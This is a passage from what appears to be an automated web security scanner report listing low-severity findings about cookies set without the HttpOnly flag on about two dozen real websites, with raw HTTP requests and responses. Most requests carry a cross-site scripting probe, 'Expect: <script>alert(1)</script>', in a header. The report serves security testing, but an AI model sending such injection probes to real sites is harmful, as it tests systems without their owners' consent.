Expires: Wed, 04 May 2011 03:52:26 GMT
Cache-Control: public, max-age=7200
Accept-Ranges: bytes
Set-Cookie: __cfduid=d728dce90a0eb648333c9394c9cbf73651304473946; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.thefreeiqtest.org
Set-Cookie: __cfduid=d728dce90a0eb648333c9394c9cbf73651304473946; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.thefreeiqtest.org

......00.... ..%..F... .... ......%........ ..    ...6........ .h....@..(...0...`..... ......%............................................................................................................
...[SNIP]...

15.262. http://www.thehawkeye.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehawkeye.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehawkeye.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1738
Content-Type: text/html
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:28:41 GMT
Connection: close
Set-Cookie: NSC_DNTQ-OfxDNT=ffffffff09021f3545525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

15.263. http://www.thehorrordome.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehorrordome.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehorrordome.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Date: Wed, 04 May 2011 00:50:03 GMT
Content-Length: 19399
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: anonymousID=5jOKBmeXzAEkAAAANGJjYTBhMDgtMDI4Yi00ZjJlLThmNjgtOWNjYTI4NzJlZjIzZAhK1pnjGvVUlxMBrIsiF9QZi2c1; expires=Mon, 31-Oct-2011 00:50:03 GMT; path=/; HttpOnly
Set-Cookie: chkvalues=y2OQK7WbjFhnaIqejB5qFgWYgpFVR5lqmOfyHuWZxumlJpIfnO1Zy4XG9s2TMXUr; expires=Mon, 31-Oct-2011 00:50:03 GMT; path=/
Set-Cookie: .ASPXAUTHSF=; expires=Tue, 12-Oct-1999 04:00:00 GMT; path=/; HttpOnly
Set-Cookie: chkvalues=y2OQK7WbjFhnaIqejB5qFgWYgpFVR5lqmOfyHuWZxumlJpIfnO1Zy4XG9s2TMXUr; expires=Mon, 31-Oct-2011 00:50:03 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_headTag"><titl
...[SNIP]...

15.264. http://www.thepersonalcarecatalog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thepersonalcarecatalog.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thepersonalcarecatalog.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: http://media.thepersonalcarecatalog.com/thepersonalcarecatalog/i/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wt1ce03xqjg3de45hhg40ov1; path=/; HttpOnly
Set-Cookie: PSGUID=e49185e2-b366-4a91-9253-6467838af9cf; expires=Fri, 03-Jun-2011 02:00:57 GMT; path=/
X-AspNet-Version: 2.0.50727
P3P: CP="CAO PSA OUR"
Server-Name: SF-WEB90F
Date: Wed, 04 May 2011 02:00:57 GMT
Content-Length: 0
Set-Cookie: BIGipServerWEBFX-2=1342341130.20480.0000; path=/


15.265. http://www.thesportsgearcatalog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thesportsgearcatalog.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thesportsgearcatalog.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: http://media.thesportsgearcatalog.com/thesportsgearcatalog/i/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bpjqsx45e0eiuf45jrvvj245; path=/; HttpOnly
Set-Cookie: PSGUID=0cbd5d03-f99c-467f-a1d7-2d7d57f4e66a; expires=Fri, 03-Jun-2011 02:26:10 GMT; path=/
X-AspNet-Version: 2.0.50727
P3P: CP="CAO PSA OUR"
Server-Name: SF-WEB90E
Date: Wed, 04 May 2011 02:26:10 GMT
Content-Length: 0
Set-Cookie: BIGipServerWEBFX-2=1073905674.20480.0000; path=/


15.266. http://www.tickettoread.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tickettoread.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tickettoread.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"5686-1283201680000"
Last-Modified: Mon, 30 Aug 2010 20:54:40 GMT
Content-Length: 5686
Date: Wed, 04 May 2011 03:51:05 GMT
Set-Cookie: BIGipServerT2R_ROOT_PROD=2154080448.60485.0000; expires=Wed, 04-May-2011 05:51:05 GMT; path=/
pics-label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (v 0 s 0 n 0 l 0))

..............h...&... .... .........(....... ...............................mln.4S..5^..6_..<^..>l..7b..7g..>m..<o..5h..8g..8d..9e..:f..9j..6i..6i..6k..6k..6j..6i..7j..7m..7j..8m..8n..9o..9o..8k..>t
...[SNIP]...

15.267. http://www.timewarnercableoffers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timewarnercableoffers.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.timewarnercableoffers.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:19:52 GMT
Server: Apache
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerproduction_app_http=2249797386.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.268. http://www.trade-schools.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trade-schools.net
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trade-schools.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie:WEBTRENDS_ID=173.193.214.243-1220582112.30149128; expires=Thu, 03-May-2012 03:06:38 GMT; path=/
Set-Cookie:WEBTRENDS_ID=173.193.214.243-1220582112.30149128; expires=Thu, 03-May-2012 03:06:38 GMT; path=/
Date: Wed, 04 May 2011 03:06:38 GMT
Content-Length: 0
Server: Microsoft-IIS/6.0


15.269. http://www.trails-end.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trails-end.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trails-end.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:04:14 GMT
Server: Web Server 1.0
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_xfbwfs_qpqdpso_tubujd_mc=ffffffff09c904f245525d5f4f58455e445a4a423660;expires=Wed, 04-May-2011 03:18:49 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.270. http://www.tristatehomepage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tristatehomepage.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tristatehomepage.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:01:04 GMT
Server: Apache/2.2.15 (Fedora)
Content-Length: 479
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerDallasPool=261492746.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.271. http://www.truewoman.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truewoman.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:14:36 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 14433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

15.272. http://www.truewoman.com/favicon.ic  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truewoman.com
Path:   /favicon.ic

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ic HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:14:32 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 9641


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

15.273. http://www.tunewiki.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tunewiki.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tunewiki.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:11:08 GMT
Connection: close
Content-Length: 60
Set-Cookie: SERVERID=dayweb01; path=/

The page cannot be displayed because the expectation failed.

15.274. http://www.tutorialblog.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tutorialblog.org
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tutorialblog.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: cloudflare-nginx
Date: Wed, 04 May 2011 00:45:43 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Location: http://tutorialblog.org/favicon.ico
Cache-Control: public, max-age=7200
Expires: Wed, 04 May 2011 02:45:43 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Set-Cookie: __cfduid=d8a7eb6214fbbc90b40ede30ff09a40301304469943; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.tutorialblog.org
Set-Cookie: __cfduid=d8a7eb6214fbbc90b40ede30ff09a40301304469943; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.tutorialblog.org
Content-Length: 329

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://tutorialblog.org
...[SNIP]...

15.275. http://www.uhaulhr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uhaulhr.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uhaulhr.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: RQFW={3827BDBB-A7FB-4C7B-A8D5-CA9E3A695953}; path=/;
Date: Wed, 04 May 2011 02:43:11 GMT


15.276. http://www.vegasview.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vegasview.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vegasview.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: X-Mapping-bghfahco=8313510636CE875D636B546E4BA63827; path=/
Content-Length: 60
Date: Wed, 04 May 2011 00:47:34 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Type: text/html

The page cannot be displayed because the expectation failed.

15.277. http://www.virginhealthmiles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virginhealthmiles.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.virginhealthmiles.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:23:57 GMT
Set-Cookie: BIGipServerwww.virginhealthmiles.com-http=369430700.20480.0000; path=/


15.278. http://www.vitamin-insight.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vitamin-insight.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vitamin-insight.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: http://media.vitamin-insight.com/i/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ntt3eyzjstjbax45rtwdloyv; path=/; HttpOnly
Set-Cookie: PSGUID=d0c3e800-2506-4d10-9fda-8de0b8288675; expires=Fri, 03-Jun-2011 03:10:29 GMT; path=/
X-AspNet-Version: 2.0.50727
Server-Name: MIS-WEB90G
P3P: CP="CAO PSA OUR"
Date: Wed, 04 May 2011 03:10:28 GMT
Content-Length: 0
Set-Cookie: BIGipServerWEBFX-2=1426209802.20480.0000; path=/


15.279. http://www.votigo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.votigo.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.votigo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=NJMZMZS192.168.1.246CKMLQ; path=/
Date: Wed, 04 May 2011 03:03:39 GMT
Server: Apache
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.280. http://www.wben.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wben.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wben.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:15:26 GMT
Server: Apache/1.3.29 (Unix) mod_gzip/1.3.26.1a PHP/4.2.3
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerRadio_Pool=3054520387.20480.0000; path=/
Content-Length: 435

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...

15.281. http://www.weather.com.cn/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com.cn
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.weather.com.cn
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.2.6 (Unix) DAV/2 SVN/1.4.6 mod_jk/1.2.26
Date: Wed, 04 May 2011 02:54:05 GMT
Content-Type: image/x-icon
Content-Length: 894
Last-Modified: Tue, 18 May 2010 16:13:09 GMT
Connection: keep-alive
Expires: Fri, 03 Jun 2011 02:54:05 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Set-Cookie: BIGipServerwww_pool=45679677.20480.0000; path=/

..............h.......(....... .................................................UN.+#....0(...............................ql.HA.............C;.........................5-................-%....d^.......
...[SNIP]...

15.282. http://www.whatshehastosay.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whatshehastosay.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.whatshehastosay.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Set-Cookie: ARPT=VVJJXKScfweb15CKMJQ; path=/
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
a4: WSHTS
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:14:08 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

15.283. http://www.whitepages.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitepages.ca
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.whitepages.ca
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 03:16:56 GMT
Status: 200 OK
X-Runtime: 0.02728
ETag: "819b009dba80241e53c53603d55c1ce1"
Connection: keep-alive
Set-Cookie: wp_endemic_provider=B; domain=.whitepages.ca; path=/; expires=Wed, 04 May 2011 15:16:56 GMT
Set-Cookie: wp_perm=pid%3D93sYFnX8EeCdSQAfKQmSpg; domain=.whitepages.ca; path=/; expires=Thu, 03 May 2012 03:16:56 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.whitepages.ca; path=/; expires=Thu, 03 May 2012 03:16:56 GMT
Set-Cookie: _wpn_sid=e070ab7070942dc475186e058fe80f9c; domain=.whitepages.ca; path=/
Content-Length: 15589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Free Peo
...[SNIP]...

15.284. http://www.williams.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.williams.edu
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.williams.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:53:26 GMT
Server: Apache
Content-Length: 455
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt_xxx_iuuq=c7f63a1f3660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.285. http://www.woman-and-beast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.woman-and-beast.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.woman-and-beast.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 03:40:03 GMT
Content-Type: image/x-icon
Content-Length: 0
Last-Modified: Wed, 04 Aug 2010 15:48:02 GMT
Connection: close
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: X-Backend=web2; path=/
X-Backend: web2
X-Country: US
